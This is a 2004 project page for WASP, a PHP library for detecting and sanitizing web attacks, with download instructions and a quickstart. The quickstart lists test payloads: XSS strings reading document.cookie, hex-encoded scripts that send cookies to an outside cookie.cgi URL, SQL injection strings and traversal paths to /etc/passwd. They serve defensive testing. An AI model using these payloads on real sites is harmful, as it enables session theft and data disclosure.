The WASP Project


WASP is a library for various web development environments (such as PHP, Python, Perl, Ruby, etc...) that has the following caracteristics :
  1. Detect possible attacks (such as an IDS but at script level)
  2. Make MORE SECURE web applications (at the moment only with PHP)
  3. Functions to correctly SANITIZE strings
  4. Easy encription
  5. Control by IP and MAC address

Status

Actually, I only write the PHP version, but in sort time I will publish the version for Python.

PHP Sec, A security library for PHP

Currently (Sat Sep 25 2004) this library is able to :
  1. Detect SQL Injection, Cross Site Scripting, Directory Traversal and various other web attacks
  2. Sanitize strings to clean meta-characters (XSS, SQL Injection, etc...)
  3. Encrypt/decrypt data, in an easy way by using 2 functions (uses mcrypt and the mcrypt extension for PHP)
  4. Gather information (very basic) about the client host

Download

You can download a gziped package file with the nightly CVS Tree Tarball.

CVS Access (Recommended)

This project's CVS repository can be checked out through anonymous CVS over SSH with the following instruction set. The module you wish to check out must be specified as the modulename. When prompted for a password for anoncvs, simply press the Enter key.

The SSHv2 public key fingerprints for the machine hosting the cvs trees are:

RSA: 1024 80:5a:b0:0c:ec:93:66:29:49:7e:04:2b:fd:ba:2c:d5
DSA: 1024 4d:c8:dc:9a:99:96:ae:cc:ce:d3:2b:b0:a3:a4:95:a5

Software repository :

export CVS_RSH="ssh"
cvs -z3 -d:ext:anoncvs@savannah.nongnu.org:/cvsroot/wasp co wasp

Browse CVS

You can browse the cvs repository at the savannah.nongnu.org site

Basic samples?

In the CVS repository are 6 very easy samples to check this library. You can view (not run, sorry) online these samples by browsing the samples directory in the CVS repository.

Quickstart?

The most quickly way to start playing with this pretty library is by inserting the following lines of code in your PHP script :

include("php_sec.php"); //the library

if (!sec_paranoid_check_all_params())
{
die("Attack detected. STOP");
}

Next try to attack your PHP script with common (or uncommon) sql injection, cross site scripting, etc... related attacks. In example, if your application has a form, try inserting any (or all) of the following XSS attacks :
  1. "><script>alert(document.cookie)</script>
  2. "><img src="image.png" onclick="javascript:alert(document.cookie)">
  3. "><h1>Hi!</h1>
You can try, also, hexadecimal attacks, such as :

  1. %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
  2. %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75 %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

Or, any valid SQL Injection attack. Samples :

  1. ' or 1=1--
  2. "/*" and "*/", or "{" and "}" (Evasion techniques for Ansi SQL and Informix Databases, respectively)
  3. ' union select bla, bla, bla, bla


Or, directory traversal attacks. More samples :

  1. /../../../../../../../etc/passwd
  2. %5c..%5c%2e%2e%5c..%5c..%5c..%5cboot.ini
  3. %2f.%2e%2F%2e%2E/../foobar

Documentation

You can browse the on-line documentation or download it from the CVS repository.

Bugs

Bugs? What bugs? Send me any that you find.
Copyright (c) 2004 Jose Antonio Coret